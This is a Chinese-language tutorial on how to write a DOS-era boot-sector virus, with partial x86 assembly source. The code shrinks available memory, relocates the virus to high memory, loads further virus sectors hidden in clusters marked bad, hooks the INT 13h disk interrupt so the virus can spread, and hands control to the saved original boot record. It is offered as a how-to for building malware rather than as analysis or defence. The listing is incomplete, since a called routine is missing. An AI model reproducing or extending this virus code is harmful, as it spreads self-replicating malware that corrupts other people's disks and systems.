引导型病毒编制方法(含源程序)
|
引导形病毒指驻留在硬盘的主引导分区或硬软盘的 DOS 引导分区的病毒。由于 pc 开机后,会先执行主引导分区的代码,因此病毒可以获得第一控制权,在引导 DOS
操作系统之前,作完以下事情: a. 减少dos可用最大内存量,以供己需;如: xor ax,ax mov ss,ax mov sp,7c00h mov ds,ax mov ax,word ptr ds:[413h] ; here store largest mem 0000:0413 sub ax,2 ; apply 2k mem for virus mov ds:[413h],ax b. 修改必要的中断向量,以便传播; c. 读入病毒的其它部分,进行病毒的拼装(在内存高端); 先从已标记的簇中某扇区读入病毒的其他部分,这些簇往往被标记为坏簇,(但是文件型病毒则不必如此,二者混合型亦然)然后再读入原引导记录到0000:7c00h,跳转执行。代码如下:
mov cl,06h shl ax,cl ; ax = 8F80 add ax,0840h ; ax = 97c0 mov es,ax mov si,7c00h ; si = 7c00 mov di,si mov cx,0100h repz movsw ; 将病毒移到高端. v2: push ax pop ds push ax mov bx,7c4bh push bx ret ; 指令执行转入高端内存 call v3 v3: xor ah,ah ; ah=0 int 13h mov ah,80h and byte ptr ds:[7df8h],al v4: mov bx,word ptr ds:[7df9h] ; 读入病毒的其他部分. push cs pop ax ; ax=97c0 sub ax,20h ; ax=97a0 mov es,ax ; es=97a0 call v9 mov bx,word ptr ds:[7df9h] ; load logic sector id inc bx ; bx++ , is boot sector mov ax,0ffc0h ; ffc0:8000 = 0000:7c00 读入原引导分区内容. mov es,ax call v9 xor ax,ax ; AX=0 mov byte ptr ds:[7df7h],al ; flag = 0 v5: mov ds,ax ; ds=0 mov ax,word ptr ds:[4ch] ; mov bx,word ptr ds:[4eh] ; 修改中断向量. mov word ptr ds:[4ch],7cd6h mov word ptr ds:[4eh],cs ; now int13h had been changed push cs pop ds ; ds=cs mov word ptr ds:[7d30h],ax ; save original int13 vector mov word ptr ds:[7d32h],bx ; v6: mov dl,byte ptr ds:[7df8h] ; load drive letter v7: ;======================================================= ; jmp 0000:7c00 ; here is a jump db 0eah,00h,7ch,00h,00h 这里是个跳转指令的二进制代码. ;======================================================= d. 读入原主引导分区,转去执行dos的引导工作。 源代码网整理以下 |
